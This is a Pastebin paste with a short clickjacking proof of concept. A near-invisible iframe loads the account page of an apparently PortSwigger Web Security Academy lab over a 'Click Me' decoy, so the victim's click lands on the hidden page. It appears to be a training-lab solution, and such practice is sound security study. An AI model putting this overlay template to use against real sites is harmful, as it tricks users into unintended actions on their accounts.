Advertisement
Mihao

Untitled

Jun 22nd, 2023
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.30 KB | None | 0 0
  1. <style>
  2. iframe {
  3. position: relative;
  4. width: 500px;
  5. height: 600px;
  6. opacity: 0.0001;
  7. z-index: 2;
  8.  
  9. }
  10. div {
  11. position: absolute;
  12. top: 500px;
  13. left: 50px;
  14. z-index: 1;
  15. }
  16.  
  17. </style>
  18. <div> Click Me</div>
  19. <iframe src="https://0a46007204a7f8fc80e0a3e8004b00f5.web-security-academy.net/my-account"></iframe>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement